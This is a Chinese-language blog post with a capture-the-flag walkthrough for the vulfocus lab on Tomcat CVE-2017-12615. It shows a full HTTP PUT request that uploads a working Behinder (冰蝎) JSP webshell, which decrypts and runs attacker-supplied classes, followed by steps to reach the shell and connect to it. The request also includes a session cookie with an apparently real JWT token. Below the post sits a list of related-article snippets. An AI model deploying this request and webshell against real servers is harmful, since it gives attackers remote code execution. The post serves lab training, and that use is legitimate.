tomcat 文件上传 (CVE-2017-12615)vulfocus夺旗

最新推荐文章于 2024-04-01 17:00:00 发布
最新推荐文章于 2024-04-01 17:00:00 发布
阅读量4.1k 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mtc0527/article/details/124206947
版权

漏洞原因:

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行

影响范围:Tomcat 7.0.0 - 7.0.81
测试:Tomcat 8.5.19

1、启动CVE-2017-12615目标靶场,并访问

2、burp抓包,并修改请求包
文件是1.sjp,内容是冰蝎的木马,请求方式改为put

  • 原始请求包
    在这里插入图片描述
  • 修改后的请求包
PUT /1.jsp/ HTTP/1.1
Host: 123.58.236.76:57689
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1640763811,1640775017,1640775045,1640921749; Hm_lvt_deaeca6802357287fb453f342ce28dda=1640681447,1641044574,1641123950,1641176861; ECS[visit_times]=4; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1641213978; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0MjEzLCJ1c2VybmFtZSI6IjAweW9uZ3NoaXdhbmd6aSIsImV4cCI6MTY0MTI2MzI2NCwiZW1haWwiOiIxMDcwMDg2ODgyQHFxLmNvbSJ9.aU-yjS3J_EqTEhZx8ZOSQ6SPxgSemy8XAqnFgtwX59Y
Upgrade-Insecure-Requests: 1
Content-Length: 572

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*åÆ¥:Þ¥Æ32Mmd5<„M16MؤޥÆrebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

3、repeater进行放包,放包成功
在这里插入图片描述
4、访问链接,执行jsp的木马

http://123.58.236.76:57689/1.jsp

5、使用冰蝎连接
在这里插入图片描述
看到flag值,夺旗成功

Cherish__man
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tomcat 实现文件上传下载
04-01
实现文件的上传和下载的源代码 决定没问题的。 利用了struts2 tomcat
vulfocustomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 1471
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
tomcat漏洞之任意文件上传CVE-2017-12615
weixin_53711701的博客
12-24 2928
tomcat漏洞之任意文件上传CVE-2017-12615
tomcat 文件上传(CVE-2017-12615)
m0_56157884的博客
04-02 5340
0x00 漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当存在漏洞的Tomcat 运行在 Linux主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者可能构造恶意请求利用该漏洞向服务器上传包含任意代码执行的jsp文件,并被服务器执行该文件,导致攻击者可以执行任意代码。 0x01 影响版本 Apache Tomcat 7.0.10 - 7.
tomcat10上传文件两种方式,两种亲测有效
qq_45325310的博客
03-16 2680
https://blog.csdn.net/python_hhhh/article/details/122688507
中间件安全:Apache Tomcat 文件上传.(CVE-2017-12615
最新发布
ZL_1618的博客
04-01 1232
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
CVE-2017-12615利用脚本
04-16
CVE-2017-12615是一个在Apache Tomcat服务器中发现的安全漏洞,该漏洞允许攻击者通过PUT方法上传恶意文件并执行任意命令,从而对系统造成严重的安全威胁。这个漏洞主要涉及到Tomcat文件上传功能,特别是其处理...
tomcat服务器的文件上传功能实现
天真吖的博客
12-03 1738
目录一、场景:展示向服务器添加商品,商品信息包括图片,以及其他信息1,获取数据2.添加数据3.传回数据到前台二、附:配置CATALINA_HOME三、效果展示 1,获取数据 2.添加数据 3.传回数据到前台 略 按‘i’进入insert模式,在最后加入 如:/usr/local/tomcat/apache-tomcat-9.0.68按ESC退出insert模式,按‘:wq’,保存退出使配置生效 新建一个在webapps下新建upload文件夹可以看到:pid为3的这条数据
Tomcat任意文件上传CVE-2017-12615
m0_73720136的博客
05-07 1108
掌握文件上传中的Tomcat任意文件上传CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ran的博客
01-31 2063
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
Tomcat 中是怎么处理文件上传的?
LeZiJie的博客
04-30 860
Tomcat 中是怎么处理文件上传的? 先点赞再看,养成好习惯 前言 这两天在另一个社区看到了一个关于 Tomcat 的提问,还挺有意思。正好自己之前也没思考过这个问题,今天就结合 Tomcat 机制来聊聊这个“为什么”。 本文对 HTTP 协议中的文件上传标准和 Tomcat 机制的分析内容较多,比较基础,不需要的大佬门可以直接跳到文末。 HTTP 协议中的文件上传 众所周知,HTTP 是一个文本协议,那文本协议如何传输文件呢? 直接传……是的就这么简单。文本协议只是在应...
文件上传与下载-day01&Tomcat配置
夕月希的博客
08-25 917
form表单一定要加entctype=“multipart/form-data”因为文件的上传与下载,我们经常需要使用,我们可以将IO流的代码封装成一个工具类。或许有的小伙伴会吐槽了,我都不知道Tomcat在哪里下载。Tomcat版本:apache-tomcat-8.5.82。但是这样还远远不够,仅仅是上面的代码会导致中文乱码。Apache file-upload组件上传。Servlet3.0之后提供了文件上传功能。注意注意事项:文件的下载路径,最后有个/经过上面四步,Tomcat就配置好了。...
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1154
详细教程
tomcat源码学习-http文件上传
weixin_40893295的博客
03-10 339
为什么大表单提交场景下, tomcat的请求解析性能会比netty高出100+倍? 尺有所短, 寸有所长吧, 不同的框架擅长的领域是不同的. 本文结合笔者自身工作经验带大家一起学习tomcat对表单文件提交的处理策略如何战胜神一般的netty NIO.
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在于Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值